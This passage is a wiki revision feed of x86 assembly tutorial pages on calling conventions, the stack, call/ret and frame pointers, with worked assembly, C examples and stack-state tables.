* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific attribute rather than a true calling convention, can't really be identified in assembly, since the calling convention itself is unchanged (''__cdecl'' by default). Its special property is that the compiler generates no prologue or epilogue code for the function. This allows the programmer, in an __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the compiler from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3144Functions2012-01-16T02:09:32Z<p>Killboy: /* __stdcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size of the parameters to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with an operand equal to the total size of the parameters in bytes, "ret xx"<br />
<br />
Here is an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''): <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0Ch ; The function cleans up its own stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans itself up. <br />
</pre><br />
<br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall''<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific attribute rather than a true calling convention, can't really be identified in assembly, since the calling convention itself is unchanged (''__cdecl'' by default). Its special property is that the compiler generates no prologue or epilogue code for the function. This allows the programmer, in an __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the compiler from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Stack_Example&diff=3143Stack Example2012-01-16T01:50:49Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This code should compile and run in Visual Studio (I've tested it):<br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
void __declspec(naked) swap(int *a, int *b)<br />
{<br />
__asm<br />
{<br />
push ebp ; Preserve ebp.<br />
mov ebp, esp ; Set up the frame pointer.<br />
sub esp, 8 ; Make room for two local variables.<br />
push esi ; Preserve esi on the stack.<br />
push edi ; Preserve edi on the stack.<br />
<br />
mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<br />
mov esi, [ecx] ; Dereference the first pointer to get the first value.<br />
mov edi, [edx] ; Dereference the second pointer to get the second value.<br />
<br />
mov [ebp-4], esi ; Store the first as a local variable<br />
mov [ebp-8], edi ; Store the second as a local variable<br />
<br />
mov esi, [ebp-8] ; Retrieve them in reverse<br />
mov edi, [ebp-4]<br />
<br />
mov [ecx], esi ; Put the second value into the first address.<br />
mov [edx], edi ; Put the first value into the second address.<br />
<br />
pop edi ; Restore the edi register<br />
pop esi ; Restore the esi register<br />
add esp, 8 ; Remove the local variables from the stack<br />
pop ebp ; Restore ebp<br />
ret ; Return (eax isn't set, so there's no return value)<br />
}<br />
}<br />
<br />
int main(int argc, char* argv[])<br />
{<br />
int a = 3; <br />
int b = 4;<br />
<br />
printf("a = %d, b = %d\n", a, b);<br />
swap(&a, &b);<br />
printf("a = %d, b = %d\n", a, b);<br />
<br />
while(1)<br />
;<br />
<br />
return 0;<br />
}<br />
</pre></div>Killboyhttps://wiki.skullsecurity.org/index.php?title=The_Stack&diff=3142The Stack2012-01-16T01:07:57Z<p>Killboy: /* Frame Pointer */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The stack is, at best, a difficult concept to understand. However, understanding the stack is essential to reverse engineering code. <br />
<br />
The stack register, esp, is basically a register that points to an arbitrary location in memory called "the stack". The stack is just a really big section of memory where temporary data can be stored and retrieved. When a function is called, some stack space is allocated to the function, and when a function returns the stack should be in the same state it started in. <br />
<br />
The stack always grows downwards, towards lower addresses. The esp register always points to the lowest address currently in use on the stack (the "top" of the stack). Anything below esp is considered free memory that can be overwritten. <br />
<br />
The stack stores function parameters, local variables, and the return address of every function. <br />
<br />
== Function Parameters ==<br />
When a function is called, its parameters are typically stored on the stack before making the call. Here is an example of a function call in C:<br />
func(1, 2, 3); <br />
And here is the equivalent call in assembly:<br />
push 3<br />
push 2<br />
push 1<br />
call func<br />
add esp, 0Ch<br />
<br />
The parameters are put on the stack, then the function is called. The function has to know it's getting 3 parameters, which is why function parameters have to be declared in C. <br />
<br />
After the function returns, the stack pointer is still 12 bytes below where it started. In order to restore the stack to where it used to be, 12 (0x0c) has to be added to the stack pointer. The three pushes, of 4 bytes each, mean that a total of 12 was subtracted from the stack pointer. <br />
<br />
Here is what the initial stack looked like (with ?'s representing unknown stack values):<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
Note that the same 5 32-bit stack values are shown in all these examples, with the stack pointer at the left moved. The stack goes much further up and down, but that isn't shown here. <br />
<br />
Here are the three pushes:<br />
<br />
<br />
<br />
push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Now all three values are on the stack, and esp is pointing at the 1. The function is called, and returns, leaving the stack the way it started. Now the final instruction runs:<br />
<br />
<br />
<br />
add esp, 0Ch<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note that the 3, 2, and 1 are still on the stack. However, they're below the stack pointer, which means that they are considered free memory and will be overwritten.<br />
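<br />
The walk-through above can be mimicked with a small C model. This is only a sketch: the ToyStack type, its 16-dword size, and the toy_* function names are all made up for illustration, and esp is modelled as a byte offset into an array rather than a real address.<br />

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define STACK_WORDS 16                    /* hypothetical size for the demo */
#define STACK_BYTES (STACK_WORDS * 4u)

/* Toy model of a 32-bit stack; esp is a byte offset into mem. */
typedef struct {
    uint32_t mem[STACK_WORDS];
    uint32_t esp;
} ToyStack;

/* An empty stack starts with esp at the highest address. */
void toy_init(ToyStack *s)
{
    memset(s->mem, 0, sizeof s->mem);
    s->esp = STACK_BYTES;
}

/* push: subtract 4 from esp, then store the value at the new esp. */
void toy_push(ToyStack *s, uint32_t value)
{
    assert(s->esp >= 4);
    s->esp -= 4;
    s->mem[s->esp / 4] = value;
}

/* add esp, n: only the pointer moves; the old values are not erased. */
void toy_add_esp(ToyStack *s, uint32_t n)
{
    assert(s->esp + n <= STACK_BYTES);
    s->esp += n;
}

/* Read the dword at [esp + offset]; the offset may be negative. */
uint32_t toy_peek(const ToyStack *s, int32_t offset)
{
    int32_t addr = (int32_t)s->esp + offset;
    assert(addr >= 0 && addr + 4 <= (int32_t)STACK_BYTES);
    return s->mem[addr / 4];
}
```

Pushing 3, 2, and 1 and then calling toy_add_esp with 12 returns esp to its starting value, while toy_peek at offsets -4, -8, and -12 still reads 3, 2, and 1, which is the "free but not yet overwritten" state described above.<br />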
<br />
== call and ret Revisited ==<br />
<br />
The ''call'' instruction pushes the address of the next instruction onto the stack, then jumps to the specified function. <br />
<br />
The ''ret'' instruction pops the next value off the stack, which should have been put there by a call, and jumps to it. <br />
<br />
Here is some example code:<br />
0x10000000 push 3<br />
0x10000001 push 2<br />
0x10000002 push 1<br />
0x10000003 call 0x10000020<br />
0x10000007 add esp, 12<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
0x10000020 mov eax, 1<br />
0x10000024 ret<br />
<br />
Now here is what the stack looks like at each step in this code:<br />
<br />
<br />
<br />
0x10000000 push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000001 push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000002 push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000003 call 0x10000020<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000020 mov eax, 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000024 ret<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000007 add esp, 12<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x10000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note the return address being pushed onto the stack by call, and being popped off the stack by ret.<br />
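<br />
The behaviour of ''call'' and ''ret'' can also be sketched in C. The ToyCpu type and the cpu_* names are hypothetical, and the instruction length is passed in by hand: the listing above uses simplified addresses in which the call occupies 4 bytes, whereas a real near call with a 32-bit displacement is 5 bytes long.<br />

```c
#include <assert.h>
#include <stdint.h>

#define CPU_STACK_WORDS 8u   /* hypothetical toy stack size */

/* Toy CPU: a tiny stack of dwords plus an instruction pointer. */
typedef struct {
    uint32_t stack[CPU_STACK_WORDS];
    uint32_t sp;    /* index of the top entry; CPU_STACK_WORDS means empty */
    uint32_t eip;   /* address of the instruction being executed */
} ToyCpu;

/* call: push the address of the next instruction, then jump to target. */
void cpu_call(ToyCpu *cpu, uint32_t target, uint32_t call_length)
{
    assert(cpu->sp > 0);
    cpu->sp--;                                      /* stack grows downwards */
    cpu->stack[cpu->sp] = cpu->eip + call_length;   /* return address */
    cpu->eip = target;
}

/* ret: pop the return address off the stack and jump to it. */
void cpu_ret(ToyCpu *cpu)
{
    assert(cpu->sp < CPU_STACK_WORDS);
    cpu->eip = cpu->stack[cpu->sp];
    cpu->sp++;
}
```

Starting with eip at 0x10000003 and calling cpu_call with target 0x10000020 and a length of 4 leaves 0x10000007 on top of the toy stack; cpu_ret then sets eip back to 0x10000007, mirroring the tables above.<br />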
<br />
== Saved Registers ==<br />
Some registers (ebx, edi, esi, ebp) are generally considered to be non-volatile. What that means is that a function must return with those registers holding the same values they had when it was called, so any function that uses them has to save them first. Typically, this is done by pushing them onto the stack at the start of a function, and popping them in reverse order at the end. Here is a simple example:<br />
<br />
; function test()<br />
push esi<br />
push edi<br />
.....<br />
pop edi<br />
pop esi<br />
ret<br />
<br />
== Local Variables ==<br />
<br />
At the beginning of most functions, space for local variables is allocated. This is done by subtracting the total size of all local variables from the stack pointer at the start of the function, then referencing them relative to the stack pointer or the frame pointer. An example of this will be demonstrated in the following section. <br />
<br />
== Frame Pointer ==<br />
The frame pointer is the final piece of the puzzle. Unless a program has been optimized, ebp is set to point at the base of the function's stack frame, just above the local variables. The reason for this is that throughout a function, the stack pointer changes (due to saving registers, making function calls, and other reasons), so keeping track of where the local variables are relative to the stack pointer is tricky. The frame pointer, on the other hand, is stored in a non-volatile register, ebp, so it never changes during the function. <br />
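<br />
To make the fixed offsets concrete, here is a small C sketch of where parameters and local variables sit relative to ebp. It assumes the usual 32-bit prologue (push ebp, then mov ebp, esp), parameters passed on the stack, and 4-byte slots; the function names are invented for this illustration.<br />

```c
#include <stdint.h>

/* With the standard prologue, the frame looks like this:
 *   [ebp+0]  saved ebp of the caller
 *   [ebp+4]  return address pushed by call
 *   [ebp+8]  first parameter, [ebp+12] second parameter, ...
 *   [ebp-4]  first local variable, [ebp-8] second local, ...
 */

/* Offset from ebp of the n-th stack parameter (n starts at 0). */
int32_t param_offset(uint32_t n)
{
    return 8 + 4 * (int32_t)n;
}

/* Offset from ebp of the n-th 4-byte local variable (n starts at 0). */
int32_t local_offset(uint32_t n)
{
    return -4 * ((int32_t)n + 1);
}
```

Under these assumptions the first two parameters are at ebp+8 and ebp+12 and the first two locals at ebp-4 and ebp-8, no matter how many values are pushed or popped later in the function.<br />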
<br />
Here is an example of a swap function that uses two parameters passed on the stack and two local variables to store the interim values (if you don't fully understand this, don't worry too much -- I don't either. IDA tends to look after this kind of stuff for you automatically, so this is more theory than actual useful information. Please note that the virtual memory addresses have been modified for simplicity; in reality, each address would increase by the size of the previous instruction):<br />
<br />
<pre><br />
0x400000 push ecx ; A pointer to an integer in memory - second parameter (param2)<br />
0x400001 push edx ; Another integer pointer - first parameter (param1)<br />
0x400002 call 0x401000 ; Call the swap function<br />
0x400003 add esp, 8 ; Balance the stack<br />
.....<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put param1 (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put param2 (a pointer) into edx.<br />
<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<br />
0x40100d mov [edx], edi ; Put the first value into the second address (*param2 = first value)<br />
0x40100e mov [ecx], esi ; Put the second value into the first address (*param1 = second value)<br />
<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
0x401012 pop ebp ; Restore ebp<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
</pre><br />
<br />
(You can download the complete code to test this example in Visual Studio [[Stack_Example|here]].)<br />
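<br />
For comparison, here is a rough C sketch of what the assembly is meant to do, assuming the intent described in its comments (exchange the two pointed-to values). The names var1, var2 and swap_selfcheck are illustrative only, and a real compiler would not necessarily produce exactly the listing above from this source:<br />
<br />
```c
#include <assert.h>

/* Rough C equivalent of the swap routine, assuming it is meant to
   exchange the two pointed-to values as its comments describe. */
void swap(int *a, int *b)   /* a is at [ebp+8], b is at [ebp+12] */
{
    int var1;               /* local variable at [ebp-4] */
    int var2;               /* local variable at [ebp-8] */

    var1 = *a;              /* first value  */
    var2 = *b;              /* second value */

    *b = var1;              /* second address receives the first value */
    *a = var2;              /* first address receives the second value */
}

/* Self-check: exchange two integers and confirm they traded places. */
void swap_selfcheck(void)
{
    int x = 1, y = 2;

    swap(&x, &y);
    assert(x == 2 && y == 1);
}
```
<br />
Calling swap_selfcheck() from a main function is enough to try it out. The parameters live above ebp (positive offsets) and the locals below it (negative offsets), which is the layout the tables in the walkthrough trace.<br />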
<br />
<br />
<br />
Because this is such a complicated example, it's valuable to go through it step by step, keeping track of the stack (again, if you use IDA, the stack variables will automatically be identified, but you should still understand how this works):<br />
<br />
Initial stack:<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100' style='color: red;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400002 call 0x401000 ; Call the swap function<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(ebp's value)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
